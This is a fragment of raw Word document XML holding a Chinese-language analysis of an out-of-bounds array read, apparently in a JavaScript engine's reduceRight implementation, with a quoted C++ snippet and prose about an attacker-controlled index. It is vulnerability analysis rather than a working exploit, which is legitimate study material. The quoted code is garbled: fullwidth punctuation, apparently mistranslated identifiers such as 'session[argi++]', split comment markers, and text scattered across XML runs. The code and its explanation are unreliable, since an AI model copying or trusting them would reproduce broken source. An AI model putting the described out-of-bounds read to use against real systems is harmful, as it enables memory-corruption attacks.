          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> + =</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tep</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JSBool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hole;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D00AFFA" w14:textId="04D89E9C" w:rsidR="0026102A" w:rsidRDefault="005D386D">
      <w:pPr>
        <w:spacing w:before="20"/>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JS_CHECK_OPERATION_LIMIT</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E671AE8" w14:textId="0480234E" w:rsidR="005D386D" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5920"/>
        </w:tabs>
        <w:spacing w:before="33" w:line="254" w:lineRule="auto"/>
        <w:ind w:left="520" w:right="2577"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GetElement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，＆</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>hole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tvr.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（））</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>; /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>283</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6BE8FB" w14:textId="05497701" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5920"/>
        </w:tabs>
        <w:spacing w:before="33" w:line="254" w:lineRule="auto"/>
        <w:ind w:left="520" w:right="2577"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>intN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>argi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD5B309" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4840"/>
        </w:tabs>
        <w:spacing w:before="20"/>
        <w:ind w:left="520"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>REDUCE_MODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>））</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>将参数设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reduceRight</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D422F8B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="33"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CE7BB3" w14:textId="231DCE6E" w:rsidR="005D386D" w:rsidRDefault="00691AB9" w:rsidP="005D386D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3040"/>
          <w:tab w:val="left" w:pos="5440"/>
        </w:tabs>
        <w:spacing w:before="14" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="3297"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>session [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>argi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>++]</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>上一个</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F26C813" w14:textId="49850FC7" w:rsidR="0026102A" w:rsidRDefault="00691AB9" w:rsidP="005D386D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3040"/>
          <w:tab w:val="left" w:pos="5440"/>
        </w:tabs>
        <w:spacing w:before="14" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="3297"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>session [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>argi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">++] = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tvr.</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>前会话</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>argi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ++] =Int32Value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>argi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">] = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>objv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>; /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>数组</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DD68647" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EA118E" w14:textId="4DEE44DA" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:ind w:left="1120"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ *</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>o the call</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B06488" w14:textId="48D42E65" w:rsidR="0026102A" w:rsidRDefault="00691AB9" w:rsidP="005D386D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4720"/>
        </w:tabs>
        <w:spacing w:before="14"/>
        <w:ind w:left="1000"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ok= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>session.invoke</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>; //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>回调</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="410D7745" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CA55EF2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="92" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="472"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tvr.value将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>返回包含jsval_layout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>联合的Val</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ue类实例。此Value实例是使用GetElement函数中的越</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">界数组索引派生的。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>jsv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>al_layout联合表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>示Value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实例可以解释为Integer，String或Object值，具体取决于obj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-&gt; slots [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attacker_control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>地址处的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>内存内容</w:t>
      </w:r>
